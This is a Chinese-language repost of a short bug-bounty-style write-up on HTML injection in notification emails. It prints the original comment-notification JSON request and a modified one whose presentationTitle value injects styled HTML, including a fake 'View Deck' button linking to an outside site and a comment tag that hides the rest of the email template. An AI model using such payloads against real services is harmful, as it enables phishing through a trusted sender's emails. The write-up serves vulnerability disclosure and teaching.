记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

利用电子邮件中的HTML注入

2020-11-22 13:30

HTMLi是一个在呈现HTML代码的任何应用程序中可利用的漏洞。电子邮件是其中之一。

本文的其余部分说明了如何通过目标上的注释通知功能将HTML注入电子邮件中。

Part 01

记得这里未讨论的HTML注入吗?


因此,在通知电子邮件中反映了comment和presentationTitle参数的值。

最初看起来如下:


{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"This is Redacted","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted Copy www.footstep.ninja","slideLocalId":"5p3nrib"}}


然后,在为参数注入presentationTitleHTML属性后,它看起来如下所示:


{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted\" <br/><br/> <div style='color:#1a3a69;line-height:1.5em;font-size:18px;text-align:center'>This is a test comment</div><br/> <a style='background-color:#f68270;border:1px solid #333333;border-color:#f68270;border-radius:6px;border-width:1px;color:#ffffff;display:inline-block;font-family:arial,helvetica,sans-serif;font-size:16px;font-weight:bold;letter-spacing:0px;line-height:16px;padding:12px 18px 12px 18px;text-align:center;text-decoration:none' href='https://footstep.ninja' target='_blank' data-saferedirecturl='https://footstep.ninja'>View Deck</a> <!-- Copy https://www.footstep.ninja","slideLocalId":"5p3nrib"}}


Part 02

自然通知如下所示:


Part 03

看起来像这样;


通过查看原始消息,我得到了确切的HTML:单击省略号,然后单击“显示原始”


EDI安全

扫二维码|关注我们

一个专注渗透实战经验分享的公众号



知识来源: https://mp.weixin.qq.com/s?__biz=MzIzMTQ4NzE2Ng==&mid=2247485725&idx=1&sn=69fda84d7f1e2fa97c050cbf6817a68f

阅读:8818 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“利用电子邮件中的HTML注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云